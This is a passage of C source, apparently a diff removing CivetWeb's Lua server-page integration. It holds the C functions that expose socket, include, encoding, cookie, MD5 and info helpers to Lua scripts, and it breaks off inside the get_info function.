-/* This file is part of the CivetWeb web server.
- * See https://github.com/civetweb/civetweb/
- */
-
-#include "civetweb_lua.h"
-#include "civetweb_private_lua.h"
-
-#ifdef _WIN32
-static void *
-mmap(void *addr, int64_t len, int prot, int flags, int fd, int offset)
-{
-	/* TODO (low): This is an incomplete implementation of mmap for windows.
-	 * Currently it is sufficient, but there are a lot of unused parameters.
-	 * Better use a function "mg_map" which only has the required parameters,
-	 * and implement it using mmap in Linux and CreateFileMapping in Windows.
-	 * Noone should expect a full mmap for Windows here.
-	 */
-	HANDLE fh = (HANDLE)_get_osfhandle(fd);
-	HANDLE mh = CreateFileMapping(fh, 0, PAGE_READONLY, 0, 0, 0);
-	void *p = MapViewOfFile(mh, FILE_MAP_READ, 0, 0, (size_t)len);
-	CloseHandle(mh);
-
-	/* unused parameters */
-	(void)addr;
-	(void)prot;
-	(void)flags;
-	(void)offset;
-
-	return p;
-}
-
-static void
-munmap(void *addr, int64_t length)
-{
-	/* unused parameters */
-	(void)length;
-
-	UnmapViewOfFile(addr);
-}
-
-#define MAP_FAILED (NULL)
-#define MAP_PRIVATE (0)
-#define PROT_READ (0)
-#else
-#include <sys/mman.h>
-#endif
-
-static const char *LUASOCKET = "luasocket";
-static const char lua_regkey_ctx = 1;
-static const char lua_regkey_connlist = 2;
-static const char lua_regkey_lsp_include_history = 3;
-static const char *LUABACKGROUNDPARAMS = "mg";
-
-#ifndef LSP_INCLUDE_MAX_DEPTH
-#define LSP_INCLUDE_MAX_DEPTH (32)
-#endif
-
-
-/* Forward declarations */
-static void handle_request(struct mg_connection *);
-static int handle_lsp_request(struct mg_connection *,
-                              const char *,
-                              struct mg_file *,
-                              struct lua_State *);
-
-static void
-reg_lstring(struct lua_State *L,
-            const char *name,
-            const void *buffer,
-            size_t buflen)
-{
-	if (name != NULL && buffer != NULL) {
-		lua_pushstring(L, name);
-		lua_pushlstring(L, (const char *)buffer, buflen);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_llstring(struct lua_State *L,
-             const void *buffer1,
-             size_t buflen1,
-             const void *buffer2,
-             size_t buflen2)
-{
-	if (buffer1 != NULL && buffer2 != NULL) {
-		lua_pushlstring(L, (const char *)buffer1, buflen1);
-		lua_pushlstring(L, (const char *)buffer2, buflen2);
-		lua_rawset(L, -3);
-	}
-}
-
-#define reg_string(L, name, val)                                               \
-	reg_lstring(L, name, val, val ? strlen(val) : 0)
-
-static void
-reg_int(struct lua_State *L, const char *name, int val)
-{
-	if (name != NULL) {
-		lua_pushstring(L, name);
-		lua_pushinteger(L, val);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_boolean(struct lua_State *L, const char *name, int val)
-{
-	if (name != NULL) {
-		lua_pushstring(L, name);
-		lua_pushboolean(L, val != 0);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_conn_function(struct lua_State *L,
-                  const char *name,
-                  lua_CFunction func,
-                  struct mg_connection *conn)
-{
-	if (name != NULL && func != NULL && conn != NULL) {
-		lua_pushstring(L, name);
-		lua_pushlightuserdata(L, conn);
-		lua_pushcclosure(L, func, 1);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_function(struct lua_State *L, const char *name, lua_CFunction func)
-{
-	if (name != NULL && func != NULL) {
-		lua_pushstring(L, name);
-		lua_pushcclosure(L, func, 0);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-lua_cry(struct mg_connection *conn,
-        int err,
-        lua_State *L,
-        const char *lua_title,
-        const char *lua_operation)
-{
-	switch (err) {
-	case LUA_OK:
-	case LUA_YIELD:
-		break;
-	case LUA_ERRRUN:
-		mg_cry(conn,
-		       "%s: %s failed: runtime error: %s",
-		       lua_title,
-		       lua_operation,
-		       lua_tostring(L, -1));
-		break;
-	case LUA_ERRSYNTAX:
-		mg_cry(conn,
-		       "%s: %s failed: syntax error: %s",
-		       lua_title,
-		       lua_operation,
-		       lua_tostring(L, -1));
-		break;
-	case LUA_ERRMEM:
-		mg_cry(conn, "%s: %s failed: out of memory", lua_title, lua_operation);
-		break;
-	case LUA_ERRGCMM:
-		mg_cry(conn,
-		       "%s: %s failed: error during garbage collection",
-		       lua_title,
-		       lua_operation);
-		break;
-	case LUA_ERRERR:
-		mg_cry(conn,
-		       "%s: %s failed: error in error handling: %s",
-		       lua_title,
-		       lua_operation,
-		       lua_tostring(L, -1));
-		break;
-	default:
-		mg_cry(conn, "%s: %s failed: error %i", lua_title, lua_operation, err);
-		break;
-	}
-}
-
-static int
-lsp_sock_close(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 1) && lua_istable(L, -1)) {
-		lua_getfield(L, -1, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(L, "invalid internal state in :close() call");
-		}
-		/* Do not closesocket(*psock); here, close it in __gc */
-		(void)psock;
-	} else {
-		return luaL_error(L, "invalid :close() call");
-	}
-	return 0;
-}
-
-static int
-lsp_sock_recv(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	char buf[2000];
-	int n;
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 1) && lua_istable(L, -1)) {
-		lua_getfield(L, -1, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(L, "invalid internal state in :recv() call");
-		}
-		n = recv(*psock, buf, sizeof(buf), 0);
-		if (n <= 0) {
-			lua_pushnil(L);
-		} else {
-			lua_pushlstring(L, buf, n);
-		}
-	} else {
-		return luaL_error(L, "invalid :recv() call");
-	}
-	return 1;
-}
-
-static int
-lsp_sock_send(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *buf;
-	size_t len, sent = 0;
-	int n = 0;
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 2) && lua_istable(L, -2) && lua_isstring(L, -1)) {
-		buf = lua_tolstring(L, -1, &len);
-		lua_getfield(L, -2, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(L, "invalid internal state in :close() call");
-		}
-
-		while (sent < len) {
-			if ((n = send(*psock, buf + sent, (int)(len - sent), 0)) <= 0) {
-				break;
-			}
-			sent += n;
-		}
-		lua_pushnumber(L, n);
-	} else {
-		return luaL_error(L, "invalid :close() call");
-	}
-	return 1;
-}
-
-static int
-lsp_sock_gc(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 1) && lua_istable(L, -1)) {
-		lua_getfield(L, -1, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(
-			    L,
-			    "invalid internal state in __gc for object created by connect");
-		}
-		closesocket(*psock);
-	} else {
-		return luaL_error(L, "__gc for object created by connect failed");
-	}
-	return 0;
-}
-
-/* Methods and meta-methods supported by the object returned by connect.
- * For meta-methods, see http://lua-users.org/wiki/MetatableEvents */
-static const struct luaL_Reg luasocket_methods[] = {{"close", lsp_sock_close},
-                                                    {"send", lsp_sock_send},
-                                                    {"recv", lsp_sock_recv},
-                                                    {"__gc", lsp_sock_gc},
-                                                    {NULL, NULL}};
-
-static int
-lsp_connect(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	char ebuf[100];
-	SOCKET sock;
-	union usa sa;
-	int ok;
-
-	if ((num_args == 3) && lua_isstring(L, -3) && lua_isnumber(L, -2)
-	    && lua_isnumber(L, -1)) {
-		ok = connect_socket(NULL,
-		                    lua_tostring(L, -3),
-		                    (int)lua_tonumber(L, -2),
-		                    (int)lua_tonumber(L, -1),
-		                    ebuf,
-		                    sizeof(ebuf),
-		                    &sock,
-		                    &sa);
-		if (!ok) {
-			return luaL_error(L, ebuf);
-		} else {
-			lua_newtable(L);
-			reg_lstring(L, "sock", (const char *)&sock, sizeof(SOCKET));
-			reg_string(L, "host", lua_tostring(L, -4));
-			luaL_getmetatable(L, LUASOCKET);
-			lua_setmetatable(L, -2);
-		}
-	} else {
-		return luaL_error(
-		    L, "connect(host,port,is_ssl): invalid parameter given.");
-	}
-	return 1;
-}
-
-static int
-lsp_error(lua_State *L)
-{
-	lua_getglobal(L, "mg");
-	lua_getfield(L, -1, "onerror");
-	lua_pushvalue(L, -3);
-	lua_pcall(L, 1, 0, 0);
-	return 0;
-}
-
-/* Silently stop processing chunks. */
-static void
-lsp_abort(lua_State *L)
-{
-	int top = lua_gettop(L);
-	lua_getglobal(L, "mg");
-	lua_pushnil(L);
-	lua_setfield(L, -2, "onerror");
-	lua_settop(L, top);
-	lua_pushstring(L, "aborting");
-	lua_error(L);
-}
-
-struct lsp_var_reader_data {
-	const char *begin;
-	unsigned len;
-	unsigned state;
-};
-
-
-static const char *
-lsp_var_reader(lua_State *L, void *ud, size_t *sz)
-{
-	struct lsp_var_reader_data *reader = (struct lsp_var_reader_data *)ud;
-	const char *ret;
-	(void)(L); /* unused */
-
-	switch (reader->state) {
-	case 0:
-		ret = "mg.write(";
-		*sz = strlen(ret);
-		break;
-	case 1:
-		ret = reader->begin;
-		*sz = reader->len;
-		break;
-	case 2:
-		ret = ")";
-		*sz = strlen(ret);
-		break;
-	default:
-		ret = 0;
-		*sz = 0;
-	}
-
-	reader->state++;
-	return ret;
-}
-
-
-static int
-run_lsp(struct mg_connection *conn,
-        const char *path,
-        const char *p,
-        int64_t len,
-        lua_State *L)
-{
-	int i, j, pos = 0, lines = 1, lualines = 0, is_var, lua_ok;
-	char chunkname[MG_BUF_LEN];
-	struct lsp_var_reader_data data;
-
-	for (i = 0; i < len; i++) {
-		if (p[i] == '\n')
-			lines++;
-		if (((i + 1) < len) && (p[i] == '<') && (p[i + 1] == '?')) {
-
-			/* <?= ?> means a variable is enclosed and its value should be
-			 * printed */
-			is_var = (((i + 2) < len) && (p[i + 2] == '='));
-
-			if (is_var)
-				j = i + 2;
-			else
-				j = i + 1;
-
-			while (j < len) {
-				if (p[j] == '\n')
-					lualines++;
-				if (((j + 1) < len) && (p[j] == '?') && (p[j + 1] == '>')) {
-					mg_write(conn, p + pos, i - pos);
-
-					mg_snprintf(conn,
-					            NULL, /* name only used for debugging */
-					            chunkname,
-					            sizeof(chunkname),
-					            "@%s+%i",
-					            path,
-					            lines);
-					lua_pushlightuserdata(L, conn);
-					lua_pushcclosure(L, lsp_error, 1);
-
-					if (is_var) {
-						data.begin = p + (i + 3);
-						data.len = j - (i + 3);
-						data.state = 0;
-						lua_ok = mg_lua_load(
-						    L, lsp_var_reader, &data, chunkname, NULL);
-					} else {
-						lua_ok = luaL_loadbuffer(L,
-						                         p + (i + 2),
-						                         j - (i + 2),
-						                         chunkname);
-					}
-
-					if (lua_ok) {
-						/* Syntax error or OOM. Error message is pushed on
-						 * stack. */
-						lua_pcall(L, 1, 0, 0);
-					} else {
-						/* Success loading chunk. Call it. */
-						lua_pcall(L, 0, 0, 1);
-					}
-
-					pos = j + 2;
-					i = pos - 1;
-					break;
-				}
-				j++;
-			}
-
-			if (lualines > 0) {
-				lines += lualines;
-				lualines = 0;
-			}
-		}
-	}
-
-	if (i > pos) {
-		mg_write(conn, p + pos, i - pos);
-	}
-
-	return 0;
-}
-
-
-/* mg.write: Send data to the client */
-static int
-lsp_write(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *str;
-	size_t size;
-	int i;
-	int rv = 1;
-
-	for (i = 1; i <= num_args; i++) {
-		if (lua_isstring(L, i)) {
-			str = lua_tolstring(L, i, &size);
-			if (mg_write(conn, str, size) != (int)size) {
-				rv = 0;
-			}
-		}
-	}
-	lua_pushboolean(L, rv);
-
-	return 1;
-}
-
-
-/* mg.read: Read data from the client (e.g., from a POST request) */
-static int
-lsp_read(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	char buf[1024];
-	int len = mg_read(conn, buf, sizeof(buf));
-
-	if (len <= 0)
-		return 0;
-	lua_pushlstring(L, buf, len);
-
-	return 1;
-}
-
-
-/* mg.keep_alive: Allow Lua pages to use the http keep-alive mechanism */
-static int
-lsp_keep_alive(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-
-	/* This function may be called with one parameter (boolean) to set the
-	keep_alive state.
-	Or without a parameter to just query the current keep_alive state. */
-	if ((num_args == 1) && lua_isboolean(L, 1)) {
-		conn->must_close = !lua_toboolean(L, 1);
-	} else if (num_args != 0) {
-		/* Syntax error */
-		return luaL_error(L, "invalid keep_alive() call");
-	}
-
-	/* Return the current "keep_alive" state. This may be false, even it
-	 * keep_alive(true) has been called. */
-	lua_pushboolean(L, should_keep_alive(conn));
-	return 1;
-}
-
-
-/* Stack of includes */
-struct lsp_include_history {
-	int depth;
-	const char *script[LSP_INCLUDE_MAX_DEPTH + 1];
-};
-
-
-/* mg.include: Include another .lp file */
-static int
-lsp_include(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	const char *file_name = (num_args >= 1) ? lua_tostring(L, 1) : NULL;
-	const char *path_type = (num_args >= 2) ? lua_tostring(L, 2) : NULL;
-	struct lsp_include_history *include_history;
-
-	if ((file_name) && (num_args <= 2)) {
-
-		lua_pushlightuserdata(L, (void *)&lua_regkey_lsp_include_history);
-		lua_gettable(L, LUA_REGISTRYINDEX);
-		include_history = (struct lsp_include_history *)lua_touserdata(L, -1);
-
-		if (include_history->depth >= ((int)(LSP_INCLUDE_MAX_DEPTH))) {
-			mg_cry(conn,
-			       "lsp max include depth of %i reached while including %s",
-			       (int)(LSP_INCLUDE_MAX_DEPTH),
-			       file_name);
-		} else {
-			char file_name_path[512];
-			char *p;
-			size_t len;
-			int truncated = 0;
-
-			file_name_path[511] = 0;
-
-			if (path_type && (*path_type == 'v')) {
-				/* "virtual" = relative to document root. */
-				(void)mg_snprintf(conn,
-				                  &truncated,
-				                  file_name_path,
-				                  sizeof(file_name_path),
-				                  "%s/%s",
-				                  conn->ctx->config[DOCUMENT_ROOT],
-				                  file_name);
-
-			} else if ((path_type && (*path_type == 'a'))
-			           || (path_type == NULL)) {
-				/* "absolute" = file name is relative to the
-				 * webserver working directory
-				 * or it is absolute system path. */
-				/* path_type==NULL is the legacy use case with 1 argument */
-				(void)mg_snprintf(conn,
-				                  &truncated,
-				                  file_name_path,
-				                  sizeof(file_name_path),
-				                  "%s",
-				                  file_name);
-
-			} else if (path_type && (*path_type == 'r' || *path_type == 'f')) {
-				/* "relative" = file name is relative to the
-				 * currect document */
-				(void)mg_snprintf(
-				    conn,
-				    &truncated,
-				    file_name_path,
-				    sizeof(file_name_path),
-				    "%s",
-				    include_history->script[include_history->depth]);
-
-				if (!truncated) {
-					if ((p = strrchr(file_name_path, '/')) != NULL) {
-						p[1] = '\0';
-					}
-					len = strlen(file_name_path);
-					(void)mg_snprintf(conn,
-					                  &truncated,
-					                  file_name_path + len,
-					                  sizeof(file_name_path) - len,
-					                  "%s",
-					                  file_name);
-				}
-
-			} else {
-				return luaL_error(
-				    L,
-				    "invalid path_type in include(file_name, path_type) call");
-			}
-
-			if (handle_lsp_request(conn, file_name_path, &file, L)) {
-				/* handle_lsp_request returned an error code, meaning an error
-				* occured in the included page and mg.onerror returned non-zero.
-				* Stop processing.
-				*/
-
-				lsp_abort(L);
-			}
-		}
-
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid include() call");
-	}
-	return 0;
-}
-
-
-/* mg.cry: Log an error. Default value for mg.onerror. */
-static int
-lsp_cry(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *text = (num_args == 1) ? lua_tostring(L, 1) : NULL;
-
-	if (text) {
-		mg_cry(conn, "%s", lua_tostring(L, -1));
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid cry() call");
-	}
-	return 0;
-}
-
-
-/* mg.redirect: Redirect the request (internally). */
-static int
-lsp_redirect(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *target = (num_args == 1) ? lua_tostring(L, 1) : NULL;
-
-	if (target) {
-		conn->request_info.local_uri = target;
-		handle_request(conn);
-		lsp_abort(L);
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid redirect() call");
-	}
-	return 0;
-}
-
-
-/* mg.send_file */
-static int
-lsp_send_file(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *filename = (num_args == 1) ? lua_tostring(L, 1) : NULL;
-
-	if (filename) {
-		mg_send_file(conn, filename);
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid send_file() call");
-	}
-	return 0;
-}
-
-
-/* mg.get_time */
-static int
-lsp_get_time(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int monotonic = (num_args > 0) ? lua_toboolean(L, 1) : 0;
-	struct timespec ts;
-	double d;
-
-	clock_gettime(monotonic ? CLOCK_MONOTONIC : CLOCK_REALTIME, &ts);
-	d = (double)ts.tv_sec + ((double)ts.tv_nsec * 1.0E-9);
-	lua_pushnumber(L, d);
-	return 1;
-}
-
-
-/* mg.get_var */
-static int
-lsp_get_var(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *data, *var_name;
-	size_t data_len, occurrence;
-	int ret;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args >= 2 && num_args <= 3) {
-		char *dst;
-		data = lua_tolstring(L, 1, &data_len);
-		var_name = lua_tostring(L, 2);
-		occurrence = (num_args > 2) ? (long)lua_tonumber(L, 3) : 0;
-
-		/* Allocate dynamically, so there is no internal limit for get_var */
-		dst = (char *)mg_malloc_ctx(data_len + 1, ctx);
-		if (!dst) {
-			return luaL_error(L, "out of memory in get_var() call");
-		}
-
-		ret = mg_get_var2(data, data_len, var_name, dst, data_len, occurrence);
-		if (ret >= 0) {
-			/* Variable found: return value to Lua */
-			lua_pushstring(L, dst);
-		} else {
-			/* Variable not found (TODO (mid): may be string too long) */
-			lua_pushnil(L);
-		}
-		mg_free(dst);
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid get_var() call");
-	}
-	return 1;
-}
-
-
-/* mg.get_mime_type */
-static int
-lsp_get_mime_type(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	struct vec mime_type = {0, 0};
-	struct mg_context *ctx;
-	const char *text;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tostring(L, 1);
-		if (text) {
-			if (ctx) {
-				get_mime_type(ctx, text, &mime_type);
-				lua_pushlstring(L, mime_type.ptr, mime_type.len);
-			} else {
-				text = mg_get_builtin_mime_type(text);
-				lua_pushstring(L, text);
-			}
-		} else {
-			/* Syntax error */
-			return luaL_error(L, "invalid argument for get_mime_type() call");
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid get_mime_type() call");
-	}
-	return 1;
-}
-
-
-/* mg.get_cookie */
-static int
-lsp_get_cookie(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *cookie;
-	const char *var_name;
-	int ret;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 2) {
-		/* Correct number of arguments */
-		size_t data_len;
-		char *dst;
-
-		cookie = lua_tolstring(L, 1, &data_len);
-		var_name = lua_tostring(L, 2);
-
-		if (cookie == NULL || var_name == NULL) {
-			/* Syntax error */
-			return luaL_error(L, "invalid get_cookie() call");
-		}
-
-		dst = (char *)mg_malloc_ctx(data_len + 1, ctx);
-		if (!dst) {
-			return luaL_error(L, "out of memory in get_cookie() call");
-		}
-
-		ret = mg_get_cookie(cookie, var_name, dst, data_len);
-
-		if (ret >= 0) {
-			lua_pushlstring(L, dst, ret);
-		} else {
-			lua_pushnil(L);
-		}
-		mg_free(dst);
-
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid get_cookie() call");
-	}
-	return 1;
-}
-
-
-/* mg.md5 */
-static int
-lsp_md5(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	md5_byte_t hash[16];
-	md5_state_t ctx;
-	size_t text_len;
-	char buf[40];
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			md5_init(&ctx);
-			md5_append(&ctx, (const md5_byte_t *)text, text_len);
-			md5_finish(&ctx, hash);
-			bin2str(buf, hash, sizeof(hash));
-			lua_pushstring(L, buf);
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid md5() call");
-	}
-	return 1;
-}
-
-
-/* mg.url_encode */
-static int
-lsp_url_encode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len;
-	char *dst;
-	int dst_len;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			dst_len = 3 * (int)text_len + 1;
-			dst = ((text_len < 0x2AAAAAAA) ? (char *)mg_malloc_ctx(dst_len, ctx)
-			                               : (char *)NULL);
-			if (dst) {
-				mg_url_encode(text, dst, dst_len);
-				lua_pushstring(L, dst);
-				mg_free(dst);
-			} else {
-				return luaL_error(L, "out of memory in url_decode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid url_encode() call");
-	}
-	return 1;
-}
-
-
-/* mg.url_decode */
-static int
-lsp_url_decode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len;
-	int is_form;
-	char *dst;
-	int dst_len;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1 || (num_args == 2 && lua_isboolean(L, 2))) {
-		text = lua_tolstring(L, 1, &text_len);
-		is_form = (num_args == 2) ? lua_isboolean(L, 2) : 0;
-		if (text) {
-			dst_len = (int)text_len + 1;
-			dst = ((text_len < 0x7FFFFFFF) ? (char *)mg_malloc_ctx(dst_len, ctx)
-			                               : (char *)NULL);
-			if (dst) {
-				mg_url_decode(text, (int)text_len, dst, dst_len, is_form);
-				lua_pushstring(L, dst);
-				mg_free(dst);
-			} else {
-				return luaL_error(L, "out of memory in url_decode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid url_decode() call");
-	}
-	return 1;
-}
-
-
-/* mg.base64_encode */
-static int
-lsp_base64_encode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len;
-	char *dst;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			dst = (char *)mg_malloc_ctx(text_len * 8 / 6 + 4, ctx);
-			if (dst) {
-				base64_encode((const unsigned char *)text, (int)text_len, dst);
-				lua_pushstring(L, dst);
-				mg_free(dst);
-			} else {
-				return luaL_error(L, "out of memory in base64_encode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid base64_encode() call");
-	}
-	return 1;
-}
-
-
-/* mg.base64_encode */
-static int
-lsp_base64_decode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len, dst_len;
-	int ret;
-	char *dst;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			dst = (char *)mg_malloc_ctx(text_len, ctx);
-			if (dst) {
-				ret = base64_decode((const unsigned char *)text,
-				                    (int)text_len,
-				                    dst,
-				                    &dst_len);
-				if (ret != -1) {
-					mg_free(dst);
-					return luaL_error(
-					    L, "illegal character in lsp_base64_decode() call");
-				} else {
-					lua_pushlstring(L, dst, dst_len);
-					mg_free(dst);
-				}
-			} else {
-				return luaL_error(L,
-				                  "out of memory in lsp_base64_decode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid lsp_base64_decode() call");
-	}
-	return 1;
-}
-
-
-/* mg.get_response_code_text */
-static int
-lsp_get_response_code_text(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int type1;
-	double code;
-	const char *text;
-
-	if (num_args == 1) {
-		type1 = lua_type(L, 1);
-		if (type1 == LUA_TNUMBER) {
-			/* If the first argument is a number,
-			   convert it to the corresponding text. */
-			code = lua_tonumber(L, 1);
-			text = mg_get_response_code_text(NULL, (int)code);
-			if (text)
-				lua_pushstring(L, text);
-			return text ? 1 : 0;
-		}
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid get_response_code_text() call");
-}
-
-
-/* mg.random - might be better than math.random on some systems */
-static int
-lsp_random(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	if (num_args == 0) {
-		/* The civetweb internal random number generator will generate
-		         * a 64 bit random number. */
-		uint64_t r = get_random();
-		/* Lua "number" is a IEEE 754 double precission float:
- * https://en.wikipedia.org/wiki/Double-precision_floating-point_format
-		 * Thus, mask with 2^53-1 to get an integer with the maximum
- * precission available. */
-		r &= ((((uint64_t)1) << 53) - 1);
-		lua_pushnumber(L, (double)r);
-		return 1;
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid random() call");
-}
-
-
-/* mg.get_info */
-static int
-lsp_get_info(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int type1, type2;
-	const char *arg1;
-	double arg2;
-	int len;
-	char *buf;
-
-	if (num_args == 1) {
-		type1 = lua_type(L, 1);
-		if (type1 == LUA_TSTRING) {
-			arg1 = lua_tostring(L, 1);
-			/* Get info according to argument */
-			if (!mg_strcasecmp(arg1, "system")) {
-				/* Get system info */
-				len = mg_get_system_info(NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_system_info(buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-				return 1;
-			}
-			if (!mg_strcasecmp(arg1, "context")) {
-				/* Get context */
-				struct mg_context *ctx;
-				lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-				lua_gettable(L, LUA_REGISTRYINDEX);
-				ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-				/* Get context info for server context */
-				len = mg_get_context_info(ctx, NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_context_info(ctx, buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-				return 1;
-			}
-			if (!mg_strcasecmp(arg1, "common")) {
-				/* Get context info for NULL context */
-				len = mg_get_context_info(NULL, NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_context_info(NULL, buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-				return 1;
-			}
-			return 0;
-		}
-	}
-
-	if (num_args == 2) {
-		type1 = lua_type(L, 1);
-		type2 = lua_type(L, 2);
-		if ((type1 == LUA_TSTRING) && (type2 == LUA_TNUMBER)) {
-			arg1 = lua_tostring(L, 1);
-			arg2 = lua_tonumber(L, 2);
-
-			/* Get info according to argument */
-			if (!mg_strcasecmp(arg1, "connection")) {
-
-				/* Get context */
-				struct mg_context *ctx;
-				lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-				lua_gettable(L, LUA_REGISTRYINDEX);
-				ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-				/* Get connection info for connection idx */
-				int idx = (int)(arg2 + 0.5);
-
-				/* Lua uses 1 based index, C uses 0 based index */
-				idx--;
-
-#ifdef MG_EXPERIMENTAL_INTERFACES
-				len = mg_get_connection_info(ctx, idx, NULL, 0);
-				if (len > 0) {
-					buf = mg_malloc(len + 64);
